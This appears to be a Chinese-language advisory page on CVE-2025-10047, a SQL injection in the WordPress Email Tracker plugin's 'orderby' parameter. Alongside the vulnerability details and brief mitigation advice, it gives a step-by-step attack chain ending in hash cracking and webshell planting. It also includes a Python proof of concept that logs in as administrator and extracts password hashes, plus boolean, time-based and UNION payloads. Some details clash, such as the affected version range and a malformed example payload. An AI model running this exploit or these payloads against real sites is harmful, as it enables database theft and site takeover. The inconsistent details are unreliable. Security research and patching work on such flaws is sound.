CVE-2025-10047 WordPress Email Tracker插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-10047

漏洞类型

SQL注入

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WordPress Email Tracker插件 (Email Tracker – Email Log, Email Open Tracking, Email Analytics & Email Management for WordPress Emails)

漏洞概述

CVE-2025-10047是WordPress Email Tracker插件中存在的一个SQL注入漏洞。该插件是一款用于WordPress网站的电子邮件追踪、日志记录、分析和管理工具，广泛应用于需要追踪邮件打开率和管理邮件通信的网站中。该漏洞存在于插件的所有版本中，最高影响至5.3.15版本。

漏洞的核心问题在于插件对用户提供的'orderby'参数缺乏充分的转义处理，并且在构建SQL查询时未进行足够的预处理（如使用参数化查询或预编译语句）。这使得经过身份验证的攻击者（需要具有管理员级别或更高权限）能够将额外的SQL查询附加到现有的查询中，从而从数据库中提取敏感信息。

该漏洞由Wordfence安全团队的研究员发现，并于2025年10月22日公开披露。根据CVSS 3.1评分系统，该漏洞评分为4.9分，属于中等严重等级。攻击者需要通过网络进行攻击（AV:N），攻击复杂度低（AC:L），但需要高权限（PR:H），无需用户交互（UI:N），对机密性影响高（C:H），对完整性和可用性无影响（I:N/A:N）。

虽然该漏洞需要管理员权限才能利用，但在多用户WordPress环境中，被授予管理员权限的低权限用户或被入侵的管理员账户都可能成为攻击的起点。攻击者可利用此漏洞读取数据库中的敏感信息，如用户密码哈希、个人身份信息、加密密钥等，对网站安全构成严重威胁。

技术细节

该SQL注入漏洞存在于WordPress Email Tracker插件处理数据库排序请求的过程中。具体技术细节如下：

1. **漏洞参数**：漏洞位于插件处理请求时的'orderby'参数中。该参数用于指定数据库查询结果的排序方式，但插件在接收用户输入后未对其进行充分的过滤和转义处理。

2. **根本原因**：插件直接将用户提供的'orderby'参数拼接到SQL查询语句中，而没有使用WordPress推荐的$wpdb->prepare()函数进行参数化查询。这种直接拼接的方式使得攻击者可以通过构造特殊的SQL语句片段来修改查询逻辑。

3. **利用条件**：攻击者需要拥有WordPress站点的管理员级别访问权限（Administrator-level access）。这意味着攻击者必须是一个已认证的管理员用户。

4. **攻击方式**：通过在'orderby'参数中注入恶意的SQL代码（如UNION SELECT语句），攻击者可以将额外的SQL查询附加到原始查询中。例如，构造类似`orderby=id; UNION SELECT user_pass FROM wp_users--`的payload，可以从wp_users表中提取管理员密码哈希。

5. **数据泄露**：利用此漏洞，攻击者可以读取数据库中的任何数据，包括但不限于：用户凭据、个人信息、站点配置、加密密钥等敏感数据。

6. **影响范围**：由于该漏洞影响所有5.3.15及以下版本，且插件在WordPress生态系统中使用广泛，因此影响面较大。

攻击链分析

STEP 1

步骤1：获取管理员权限

攻击者首先需要获取目标WordPress站点的管理员账户凭据。这可以通过钓鱼攻击、凭据填充、暴力破解或利用其他漏洞来实现。在多用户环境中，被入侵的低权限账户可能被提升为管理员权限。

STEP 2

步骤2：登录WordPress管理后台

使用获取的管理员凭据登录WordPress管理后台（/wp-admin/），获取有效的认证会话Cookie。

STEP 3

步骤3：定位漏洞端点

访问Email Tracker插件的管理页面，通常位于wp-admin/admin.php?page=email-tracker，该页面包含存在漏洞的数据库查询功能。

STEP 4

步骤4：构造SQL注入Payload

在'orderby'参数中注入恶意的SQL代码。可以使用UNION SELECT注入来提取数据，或使用布尔盲注、时间盲注等技术。

STEP 5

步骤5：提取敏感数据

通过注入的SQL查询从数据库中提取敏感信息，如管理员密码哈希、用户个人信息、API密钥等。

STEP 6

步骤6：进一步利用

使用提取的密码哈希进行离线破解，获取明文密码后可完全控制WordPress站点，包括上传webshell、修改内容、植入后门等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10047 - WordPress Email Tracker Plugin SQL Injection PoC
# Vulnerability: SQL Injection via 'orderby' parameter
# Affected: Email Tracker plugin <= 5.3.15
# Requirement: Authenticated Administrator access

import requests
import re

# Configuration
TARGET_URL = "http://target-wordpress-site.com"
ADMIN_USERNAME = "admin"
ADMIN_PASSWORD = "password"

# Step 1: Login to WordPress as Administrator
session = requests.Session()

login_url = f"{TARGET_URL}/wp-login.php"
login_data = {
    "log": ADMIN_USERNAME,
    "pwd": ADMIN_PASSWORD,
    "wp-submit": "Log In",
    "redirect_to": f"{TARGET_URL}/wp-admin/",
    "testcookie": "1"
}

# Set test cookie
session.cookies.set("wordpress_test_cookie", "WP%20Cookie%20check")
response = session.post(login_url, data=login_data, allow_redirects=True)

if "wp-admin" in response.url:
    print("[+] Successfully logged in as Administrator")
else:
    print("[-] Login failed")
    exit(1)

# Step 2: Exploit SQL Injection via 'orderby' parameter
# The vulnerable endpoint is typically in the admin-ajax.php or plugin-specific page
# Crafting UNION-based SQL injection payload

# Example payload to extract admin password hash
# Using ORDER BY injection technique
sqli_payload = "id,(SELECT user_pass FROM wp_users WHERE ID=1)-- -"

# Alternative time-based or error-based payloads may also work
exploit_url = f"{TARGET_URL}/wp-admin/admin.php"
exploit_params = {
    "page": "email-tracker",  # Plugin admin page
    "orderby": sqli_payload,
    "order": "DESC"
}

print(f"[*] Sending SQLi payload via 'orderby' parameter...")
response = session.get(exploit_url, params=exploit_params)

# Step 3: Extract sensitive information from response
if response.status_code == 200:
    # Look for extracted data in the response
    # The injected query result may appear in the response body
    print("[+] Request successful, analyzing response...")
    
    # Search for password hash pattern (WordPress uses phpass)
    hash_pattern = r'\$P\$[A-Za-z0-9./]{31}'
    matches = re.findall(hash_pattern, response.text)
    
    if matches:
        print(f"[+] Extracted password hashes: {matches}")
    else:
        print("[*] No obvious hashes found, check response manually")
        print(response.text[:500])
else:
    print(f"[-] Request failed with status code: {response.status_code}")

# Note: The exact endpoint and parameters may vary based on plugin version
# Additional payload examples:
# - Boolean-based: orderby=id AND (SELECT SUBSTRING(user_pass,1,1) FROM wp_users WHERE ID=1)='\$'
# - Time-based: orderby=id AND SLEEP(5)
# - UNION-based: orderby=-1 UNION SELECT user_pass FROM wp_users-- -

影响范围

WordPress Email Tracker插件 < 5.3.15

WordPress Email Tracker插件 <= 5.3.15

防御指南

临时缓解措施

在升级到修复版本之前，建议采取以下临时缓解措施：1) 限制Email Tracker插件的管理页面访问权限，仅允许受信任的IP地址访问/wp-admin/；2) 临时禁用Email Tracker插件；3) 审查所有管理员账户，移除不必要的管理员权限；4) 部署Web应用防火墙(WAF)规则，监控和阻止包含SQL注入特征的请求；5) 启用WordPress安全插件（如Wordfence）的SQL注入防护功能；6) 定期检查数据库日志，查找异常的SQL查询活动；7) 对管理员账户启用双因素认证。